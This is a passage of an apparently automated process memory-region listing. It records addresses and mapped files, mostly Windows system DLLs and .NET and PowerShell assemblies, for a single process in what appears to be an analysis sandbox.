0x1c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 897 start_va = 0x1e10000 end_va = 0x1e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 898 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 899 start_va = 0x7fefc4b0000 end_va = 0x7fefc505fff entry_point = 0x7fefc4b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 900 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 901 start_va = 0x1cb0000 end_va = 0x1d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 902 start_va = 0x1d30000 end_va = 0x1e0efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d30000" filename = "" Region: id = 903 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 904 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 905 start_va = 0x7fefdfd0000 end_va = 0x7fefed57fff entry_point = 0x7fefdfd0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 906 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 907 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 908 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 909 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 910 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 911 start_va = 0x1e0000 end_va = 0x1e3fff entry_point = 0x1e0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 912 start_va = 0x1f0000 end_va = 0x20ffff entry_point = 0x1f0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 913 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 914 start_va = 0x230000 end_va = 0x233fff entry_point = 0x230000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 915 start_va = 0x1c80000 end_va = 0x1caffff entry_point = 0x1c80000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 916 start_va = 0x1e90000 end_va = 0x215efff entry_point = 0x1e90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 917 start_va = 0x2160000 end_va = 0x21c5fff entry_point = 0x2160000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 918 start_va = 0x2220000 end_va = 0x229ffff entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 919 start_va = 0x22a0000 end_va = 0x2692fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022a0000" filename = "" Region: id = 920 start_va = 0x2830000 end_va = 0x28affff entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 921 start_va = 0x28b0000 end_va = 0x292ffff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 922 start_va = 0x7fef8e40000 end_va = 0x7fef8e4bfff entry_point = 0x7fef8e40000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 923 start_va = 0x7fef8e50000 end_va = 0x7fef8e83fff entry_point = 0x7fef8e50000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 924 start_va = 0x7fef9b40000 end_va = 0x7fef9bbffff entry_point = 0x7fef9b40000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 925 start_va = 0x7fef9bc0000 end_va = 0x7fef9bcefff entry_point = 0x7fef9bc0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 926 start_va = 0x7fefb340000 end_va = 0x7fefb396fff entry_point = 0x7fefb340000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 927 start_va = 0x7fefb730000 end_va = 0x7fefb73afff entry_point = 0x7fefb730000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 928 start_va = 0x7fefbb00000 end_va = 0x7fefbb2cfff entry_point = 0x7fefbb00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 929 start_va = 0x7fefc510000 end_va = 0x7fefc63bfff entry_point = 0x7fefc510000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 930 start_va = 0x7fefc690000 end_va = 0x7fefc883fff entry_point = 0x7fefc690000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 931 start_va = 0x7fefd980000 end_va = 0x7fefd9a2fff entry_point = 0x7fefd980000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 932 start_va = 0x7fefdce0000 end_va = 0x7fefdd15fff entry_point = 0x7fefdce0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 933 start_va = 0x7fefddd0000 end_va = 0x7fefdde9fff entry_point = 0x7fefddd0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 934 start_va = 0x7feff2f0000 end_va = 0x7feff4c6fff entry_point = 0x7feff2f0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 935 start_va = 0x7feffe60000 end_va = 0x7feffeb1fff entry_point = 0x7feffe60000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 936 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 937 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 938 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 939 start_va = 0x7fee61d0000 end_va = 0x7fee6268fff entry_point = 0x7fee61d0000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 940 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 941 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 942 start_va = 0x7fefcd50000 end_va = 0x7fefcd5bfff entry_point = 0x7fefcd50000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 943 start_va = 0x1c60000 end_va = 0x1c60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c60000" filename = "" Region: id = 944 start_va = 0x26a0000 end_va = 0x279ffff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 945 start_va = 0x2800000 end_va = 0x280ffff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 946 start_va = 0x2ab0000 end_va = 0x2b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 947 start_va = 0x753a0000 end_va = 0x75468fff entry_point = 0x753a0000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll") Region: id = 948 start_va = 0x7fee1d70000 end_va = 0x7fee270cfff entry_point = 0x7fee1d70000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll") Region: id = 949 start_va = 0x21d0000 end_va = 0x21d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021d0000" filename = "" Region: id = 950 start_va = 0x21e0000 end_va = 0x21e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021e0000" filename = "" Region: id = 951 start_va = 0x2200000 end_va = 0x221ffff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 952 start_va = 0x2930000 end_va = 0x2a30fff entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 953 start_va = 0x2b80000 end_va = 0x2bfffff entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 954 start_va = 0x2c00000 end_va = 0x1abfffff entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 955 start_va = 0x1ac00000 end_va = 0x1b2cffff entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 956 start_va = 0x1b410000 end_va = 0x1b48ffff entry_point = 0x0 region_type = private name = "private_0x000000001b410000" filename = "" Region: id = 957 start_va = 0x7fee0840000 end_va = 0x7fee171bfff entry_point = 0x7fee0840000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll") Region: id = 958 start_va = 0x7ff00010000 end_va = 0x7ff0001ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00010000" filename = "" Region: id = 959 start_va = 0x7ff00020000 end_va = 0x7ff0002ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00020000" filename = "" Region: id = 960 start_va = 0x7ff00030000 end_va = 0x7ff000cffff entry_point = 0x0 region_type = private name = "private_0x000007ff00030000" filename = "" Region: id = 961 start_va = 0x7ff000d0000 end_va = 0x7ff000dffff entry_point = 0x0 region_type = private name = "private_0x000007ff000d0000" filename = "" Region: id = 962 start_va = 0x7ff000e0000 end_va = 0x7ff0014ffff entry_point = 0x0 region_type = private name = "private_0x000007ff000e0000" filename = "" Region: id = 963 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 964 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 965 start_va = 0x21f0000 end_va = 0x21fffff entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 966 start_va = 0x1b490000 end_va = 0x1b771fff entry_point = 0x1b490000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 967 start_va = 0x7fedfe10000 end_va = 0x7fee0832fff entry_point = 0x7fedfe10000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll") Region: id = 968 start_va = 0x7fee2ff0000 end_va = 0x7fee30a1fff entry_point = 0x7fee2ff0000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll") Region: id = 969 start_va = 0x7ff00150000 end_va = 0x7ff0015ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00150000" filename = "" Region: id = 970 start_va = 0x7fffff00000 end_va = 0x7fffff0ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff00000" filename = "" Region: id = 971 start_va = 0x7fffff10000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff10000" filename = "" Region: id = 972 start_va = 0x7fedf2b0000 end_va = 0x7fedfe0cfff entry_point = 0x7fedf2b0000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll") Region: id = 973 start_va = 0x27a0000 end_va = 0x27a2fff entry_point = 0x27a0000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls") Region: id = 974 start_va = 0x1b2d0000 end_va = 0x1b38ffff entry_point = 0x1b2d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 975 start_va = 0x77e00000 end_va = 0x77e06fff entry_point = 0x77e00000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 976 start_va = 0x27b0000 end_va = 0x27b0fff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 977 start_va = 0x27c0000 end_va = 0x27c4fff entry_point = 0x27c0000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 978 start_va = 0x2a40000 end_va = 0x2a80fff entry_point = 0x2a40000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 979 start_va = 0x7ff00160000 end_va = 0x7ff0016ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00160000" filename = "" Region: id = 980 start_va = 0x27d0000 end_va = 0x27d7fff entry_point = 0x27d0000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 981 start_va = 0x27e0000 end_va = 0x27e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027e0000" filename = "" Region: id = 982 start_va = 0x1b780000 end_va = 0x1b87ffff entry_point = 0x0 region_type = private name = "private_0x000000001b780000" filename = "" Region: id = 983 start_va = 0x1e230000 end_va = 0x1e278fff entry_point = 0x1e230000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 984 start_va = 0x7fee2b20000 end_va = 0x7fee2c04fff entry_point = 0x7fee2b20000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll") Region: id = 985 start_va = 0x7fee2c10000 end_va = 0x7fee2cb9fff entry_point = 0x7fee2c10000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll") Region: id = 986 start_va = 0x7fee2cc0000 end_va = 0x7fee2fedfff entry_point = 0x7fee2cc0000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll") Region: id = 987 start_va = 0x7fee6160000 end_va = 0x7fee61c8fff entry_point = 0x7fee6160000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 988 start_va = 0x7fef2fe0000 end_va = 0x7fef3011fff entry_point = 0x7fef2fe0000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll") Region: id = 989 start_va = 0x27f0000 end_va = 0x27f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027f0000" filename = "" Region: id = 990 start_va = 0x642ff4a0000 end_va = 0x642ff4a9fff entry_point = 0x642ff4a0000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll") Region: id = 991 start_va = 0x7fee27a0000 end_va = 0x7fee27ddfff entry_point = 0x7fee27a0000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll") Region: id = 992 start_va = 0x7fee27e0000 end_va = 0x7fee28f7fff entry_point = 0x7fee27e0000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll") Region: id = 993 start_va = 0x7fee2900000 end_va = 0x7fee2b15fff entry_point = 0x7fee2900000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll") Region: id = 994 start_va = 0x2810000 end_va = 0x2820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002810000" filename = "" Region: id = 995 start_va = 0x1b390000 end_va = 0x1b3e3fff entry_point = 0x1b390000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll") Region: id = 996 start_va = 0x7fedec00000 end_va = 0x7fedf2a4fff entry_point = 0x7fedec00000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll") Region: id = 997 start_va = 0x7fee1a60000 end_va = 0x7fee1bf4fff entry_point = 0x7fee1a60000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll") Region: id = 998 start_va = 0x7fee1c00000 end_va = 0x7fee1d6bfff entry_point = 0x7fee1c00000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll") Region: id = 999 start_va = 0x27f0000 end_va = 0x27f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027f0000" filename = "" Region: id = 1000 start_va = 0x7fee18d0000 end_va = 0x7fee1a53fff entry_point = 0x7fee18d0000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorjit.dll") Region: id = 1001 start_va = 0x7ff00170000 end_va = 0x7ff0017ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00170000" filename = "" Region: id = 1002 start_va = 0x7ff00180000 end_va = 0x7ff0018ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00180000" filename = "" Region: id = 1003 start_va = 0x7ff00190000 end_va = 0x7ff0019ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00190000" filename = "" Region: id = 1004 start_va = 0x7ff001a0000 end_va = 0x7ff001affff entry_point = 0x0 region_type = private name = "private_0x000007ff001a0000" filename = "" Region: id = 1005 start_va = 0x7ff001b0000 end_va = 0x7ff001bffff entry_point = 0x0 region_type = private name = "private_0x000007ff001b0000" filename = "" Region: id = 1006 start_va = 0x7ff001c0000 end_va = 0x7ff001cffff entry_point = 0x0 region_type = private name = "private_0x000007ff001c0000" filename = "" Region: id = 1007 start_va = 0x7ff001d0000 end_va = 0x7ff001dffff entry_point = 0x0 region_type = private name = "private_0x000007ff001d0000" filename = "" Region: id = 1008 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1009 start_va = 0x7ff001e0000 end_va = 0x7ff001effff entry_point = 0x0 region_type = private name = "private_0x000007ff001e0000" filename = "" Region: id = 1010 start_va = 0x7ff001f0000 end_va = 0x7ff001fffff entry_point = 0x0 region_type = private name = "private_0x000007ff001f0000" filename = "" Region: id = 1011 start_va = 0x7ff00200000 end_va = 0x7ff0020ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00200000" filename = "" Region: id = 1012 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1013 start_va = 0x1b880000 end_va = 0x1b97ffff entry_point = 0x0 region_type = private name = "private_0x000000001b880000" filename = "" Region: id = 1014 start_va = 0x2a90000 end_va = 0x2a90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a90000" filename = "" Region: id = 1015 start_va = 0x1b980000 end_va = 0x1bc7efff entry_point = 0x1b980000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_64\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 1016 start_va = 0x7fede3b0000 end_va = 0x7fedebfafff entry_point = 0x7fede3b0000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Data\\accc3a5269658c8c47fe3e402ac4ac1c\\System.Data.ni.dll" (normalized: 